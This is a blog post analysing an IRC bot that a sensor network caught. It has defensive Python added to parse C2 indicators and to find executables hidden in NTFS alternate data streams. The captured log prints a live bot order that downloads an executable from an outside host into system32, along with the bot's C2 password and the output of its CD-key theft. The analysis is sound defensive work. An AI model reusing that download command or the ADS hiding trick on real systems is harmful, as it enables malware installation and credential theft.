
Network World

Jimmy Ray Purser

Hiding in Plain Site

By JimmyRay on Thu, 11/20/08 - 10:08am.

When I logged into my sensornet this morning I was excited to see the following in my logs:

-> PASS D3&hh*
-> USER CC-5644 * 0 :IMP1
-> NICK [T11|USA|51932]
<- :sv2.bothost.net 001 [T11|USA|51932] :
<- :sv2.bothost.net 002 [T11|USA|51932] :
<- :sv2.bothost.net 003 [T11|USA|51932] :
-> JOIN ##tshuab l3a9
<- :sv2.bothost.net 442 [T11|USA|51932] ##tshaub l3a9
<- :sv2.bothost.net 443 [T11|USA|51932] ##tshaub 6h057
<- :sv2.bothost.net NOTICE [T11|USA|51932] :*** You were forced to join ##gt
<- :sv2.bothost.net 442 [T11|USA|51932] ##gt : .get http://www.net.nu/tort.exe C:\WINDOWS\system32\tdmk.exe r h
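Pulling the indicators out of that capture is the first thing to do with it. The following is an added Python example (mine, not code from the original post or its author) that parses the IRC exchange above, logged with the same "->" client-to-server and "<-" server-to-client markers, and extracts the C2 server, the PASS/NICK credentials, the channels the bot joined or was forced into, and the download-and-drop order. The log lines are reconstructed from the post; the only bot-command syntax it knows is the one form shown above, ".get <url> <local path> [args]".

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed sample: the exchange from the post as the sensor logged it.
# "->" is client to server, "<-" is server to client.
SAMPLE_LOG = [
    r"-> PASS D3&hh*",
    r"-> USER CC-5644 * 0 :IMP1",
    r"-> NICK [T11|USA|51932]",
    r"<- :sv2.bothost.net 001 [T11|USA|51932] :",
    r"<- :sv2.bothost.net 002 [T11|USA|51932] :",
    r"<- :sv2.bothost.net 003 [T11|USA|51932] :",
    r"-> JOIN ##tshuab l3a9",
    r"<- :sv2.bothost.net 442 [T11|USA|51932] ##tshaub l3a9",
    r"<- :sv2.bothost.net 443 [T11|USA|51932] ##tshaub 6h057",
    r"<- :sv2.bothost.net NOTICE [T11|USA|51932] :*** You were forced to join ##gt",
    r"<- :sv2.bothost.net 442 [T11|USA|51932] ##gt : .get http://www.net.nu/tort.exe C:\WINDOWS\system32\tdmk.exe r h",
]

# Bot command exactly as it appears in the capture: ".get <url> <local path> [args]".
BOT_GET = re.compile(r"\.get\s+(?P<url>\S+)\s+(?P<path>\S+)(?:\s+(?P<args>.*\S))?\s*$")
FORCED_JOIN = re.compile(r"forced to join (?P<chan>#\S+)")


@dataclass
class IrcMessage:
    direction: str            # "->" or "<-"
    prefix: Optional[str]     # server or nick the message came from, if any
    command: str              # verb or three-digit numeric
    params: List[str]         # middle params, then the trailing param if present


def parse_irc_line(line: str) -> IrcMessage:
    """Split one logged line into prefix, command and params (RFC 1459 framing)."""
    direction, _, rest = line.partition(" ")
    prefix = None
    if rest.startswith(":"):
        prefix, _, rest = rest[1:].partition(" ")
    # The trailing parameter starts at the first " :" and may contain spaces.
    head, sep, trailing = rest.partition(" :")
    words = head.split()
    params = words[1:] + ([trailing] if sep else [])
    return IrcMessage(direction, prefix, words[0], params)


@dataclass
class C2Indicators:
    server: Optional[str] = None
    password: Optional[str] = None
    nick: Optional[str] = None
    channels: Dict[str, Optional[str]] = field(default_factory=dict)   # channel -> key
    downloads: List[Dict[str, str]] = field(default_factory=list)


def extract_indicators(lines: List[str]) -> C2Indicators:
    """Walk the capture and collect what a blocklist or IDS rule would need."""
    ind = C2Indicators()
    for line in lines:
        msg = parse_irc_line(line)
        if msg.direction == "<-" and msg.prefix and ind.server is None:
            ind.server = msg.prefix
        if msg.command == "PASS" and msg.params:
            ind.password = msg.params[0]
        elif msg.command == "NICK" and msg.params:
            ind.nick = msg.params[0]
        elif msg.command == "JOIN" and msg.params:
            ind.channels[msg.params[0]] = msg.params[1] if len(msg.params) > 1 else None
        elif msg.command == "NOTICE" and msg.params:
            m = FORCED_JOIN.search(msg.params[-1])
            if m:
                ind.channels.setdefault(m.group("chan"), None)
        # The download order can ride on any message type, so scan every param.
        for p in msg.params:
            m = BOT_GET.search(p)
            if m:
                ind.downloads.append({"url": m.group("url"),
                                      "drop_path": m.group("path"),
                                      "args": m.group("args") or ""})
    return ind


def hunt_terms(ind: C2Indicators) -> Dict[str, List[str]]:
    """Turn the indicators into things to search for: hosts on the wire, file names on disk."""
    hosts = [ind.server] if ind.server else []
    files = []
    for d in ind.downloads:
        host = urlparse(d["url"]).hostname
        if host:
            hosts.append(host)
        files.append(ntpath.basename(d["drop_path"]))   # ntpath: the drop path is a Windows path
    return {"hosts": hosts, "files": files}


if __name__ == "__main__":
    found = extract_indicators(SAMPLE_LOG)
    print(found)
    print(hunt_terms(found))
```

The file name that falls out of the drop path (tdmk.exe) is the hunt term for the disk side of the investigation; the two hostnames are what goes into the proxy and DNS logs.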

Ever go up to someone wearing camo and say something dumb like, "I can't see you"? I got punched in the head one time for that. (I didn't know Brad Reese was so sensitive about his wardrobe...) I have been to a ton of hacker conventions and it is easy to spot the noobs, because they tend to brute force their way into systems. They are noisier on the wire than a houseful of roosters at sunrise, plus they break file dependencies installing their own crapware. This type of behavior is great for firewall/IDS demos and for Hollywood, but in a demo or a movie, time is the enemy and you have to get to the point. Please do not confuse demos and movies with reality (unless it is Star Trek or The Force, because that could happen!). In the real world, time is on the side of the hacker/bot herder, and to keep that advantage they have to hide in plain site.

I could not find this bot on my system, so I started looking for ADS (Alternate Data Streams). An ADS is an extra named data stream attached to an NTFS file: Explorer and a plain dir listing do not show it, and the size reported for the host file only counts the unnamed stream, so whatever sits in the ADS is invisible to a casual look. I used Microsoft's STREAMS tool to find it. STREAMS is cool, since it is coded up by Mark Russinovich, so I know it's going to work. Sure enough, it did.

C:\windows\streams -s c:\windows
Streams v1.56 - Enumerate alternate NTFS data streams
Copyright (C) 1999-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\windows\kb923624.log:
   tdmk.exe:$DATA 120320

And there it is! With ADS they did not have to use the old trick of making a zero look like an O. Nope, they just took a normal system file and hid the bot inside it, a KB hotfix log file no less! Take a look in your Windows directory and see how many of those you have... I connected to my server with my "ReverseTop" (a laptop I use only for reversing; I know, I know, I'm quite a wordsmith, but alas my love is for the binary and not fer that there grammar stuff) and ran the file through DUMPBIN to dump the headers. True to form, like most bots it was wrapped in a run-time packer, in this case Petite. A little more back and forth with compression and decompression, some IA32 assembly reading, plus another Russinovich tool, Process Explorer, and I found this was a CD key stealer. I activated it in a sandbox and caught the following:

<@controller>.getcdkeys
<+[USA]51923> Microsoft Windows Product ID CD Key: xxxxxxxxx
<+[USA]51923> Half Life (Blue Shift) Product CD Key: xxxxxxx
<+[USA]51923> [CDKEYS] Search Completed

Half Life! ...how did that get there...ummm...must be my son's...
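Once one stream like that turns up, the question is what else is hiding the same way, and reading STREAMS output by eye across a whole Windows directory does not scale. The following is an added Python example (mine, not code from the post or from Sysinternals) that parses the output of `streams -s` into host-file/stream/size records, sets aside the one ADS almost every downloaded file carries (the Zone.Identifier mark-of-the-web that Windows attaches on download), flags streams with executable names or real bulk behind small files, and, on Windows only, opens a stream through its `file:stream` name to check for a PE header. The STREAMS listing it parses is reconstructed from the one above plus one constructed benign entry in a Downloads folder; the 4096-byte bulk threshold is an assumption.

```python
import ntpath
import os
import re
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of "streams -s" output: the hit from the post plus one
# ordinary mark-of-the-web stream for contrast (the Downloads entry is invented).
SAMPLE_STREAMS_OUTPUT = r"""
Streams v1.56 - Enumerate alternate NTFS data streams
Copyright (C) 1999-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\windows\kb923624.log:
   :tdmk.exe:$DATA 120320
C:\Users\jimmy\Downloads\setup.exe:
   :Zone.Identifier:$DATA 26
"""

HEADER_RE = re.compile(r"^(?P<path>\S.*):$")                              # "C:\dir\file.log:"
STREAM_RE = re.compile(r"^\s*:?(?P<name>[^:]+):\$DATA\s+(?P<size>\d+)$")  # "   :name:$DATA 120320"

EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js"}
BENIGN_STREAMS = {"Zone.Identifier"}   # mark-of-the-web written by IE/Windows on download


@dataclass
class AdsEntry:
    host_file: str
    stream: str
    size: int

    def stream_path(self) -> str:
        """The name Windows accepts to open the stream directly: file:stream."""
        return f"{self.host_file}:{self.stream}"


def parse_streams_output(text: str) -> List[AdsEntry]:
    """Pair each indented stream line with the host-file header above it."""
    entries: List[AdsEntry] = []
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = STREAM_RE.match(line)
        if m and current is not None:
            entries.append(AdsEntry(current, m.group("name"), int(m.group("size"))))
            continue
        h = HEADER_RE.match(line)
        if h:
            current = h.group("path")
    return entries


def triage(entries: List[AdsEntry], bulk_threshold: int = 4096) -> List[Tuple[AdsEntry, List[str]]]:
    """Return the streams worth a second look, each with the reasons.
    bulk_threshold is an assumed cut-off: mark-of-the-web style tags are tens of bytes."""
    findings = []
    for e in entries:
        if e.stream in BENIGN_STREAMS:
            continue
        reasons = []
        if ntpath.splitext(e.stream)[1].lower() in EXECUTABLE_EXTS:
            reasons.append("stream is named like an executable")
        if e.size >= bulk_threshold:
            host_ext = ntpath.splitext(e.host_file)[1] or "(none)"
            reasons.append(f"{e.size} bytes hidden behind a {host_ext} file")
        if reasons:
            findings.append((e, reasons))
    return findings


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with a DOS 'MZ' header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def stream_is_pe(entry: AdsEntry) -> Optional[bool]:
    """Windows only: read the stream's first bytes through the file:stream name.
    Returns None where that syntax means nothing (non-Windows) or the file is gone."""
    if os.name != "nt":
        return None
    try:
        with open(entry.stream_path(), "rb") as fh:
            return looks_like_pe(fh.read(4096))
    except OSError:
        return None


if __name__ == "__main__":
    for entry, why in triage(parse_streams_output(SAMPLE_STREAMS_OUTPUT)):
        verdict = stream_is_pe(entry)
        print(entry.stream_path(), "->", "; ".join(why),
              "" if verdict is None else f"(PE header: {verdict})")
```

Run against real `streams -s` output saved to a file, the triage leaves the Zone.Identifier noise behind and surfaces exactly the kind of entry shown above: an .exe-named stream of 120 KB riding on a .log file. The PE check is the confirmation step, since a stream name proves nothing on its own.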

I have always enjoyed chasing clues and finding things hiding in plain site. The Da Vinci Code, National Treasure, backward masking, symbology, all that stuff is a real hoot to me! And it just doesn't get any better than tracking and reversing bots! Now, if I could just grow my hair like Tom Hanks in a Robert Langdon style...

By the way... check out my way cool new podcast series! This is where I speak with folks in the know who are really changing the face of networking today. This week I spoke with Scott Cunningham of Radianta. Check it out:
http://www.networkworld.com/podcasts/geektogeek/

Jimmy Ray Purser

IUN/HP


It's cool seeing an author you met and talked with many years ago (IUN/HP). I enjoy your writing focus, style, and goals; security + attitude = hackers behind bars.

About Networking Geek to Geek

Jimmy Ray Purser is the technical co-host for Cisco's TechWise and BizWise TV. Jimmy Ray also conducts advanced training for engineers across North America and Europe and regularly speaks at industry conferences such as VON, CeBIT, N+I, and Networkers. As a field engineer, Jimmy Ray experiences networking first hand behind the console or in the rack. He is an active member in the IEEE and the Ethernet Alliance and has designed, installed and tested numerous networks for Fortune 500 companies, the United States military and other institutions worldwide. He holds 3 U.S. patents for Ethernet security algorithms with two others pending and one defensive publication, as well as numerous other vendor certifications in networking and security.

Purser holds a Bachelor of Science degree in electrical engineering from Southern Illinois University and is currently pursuing a Master of Science degree in electrical engineering.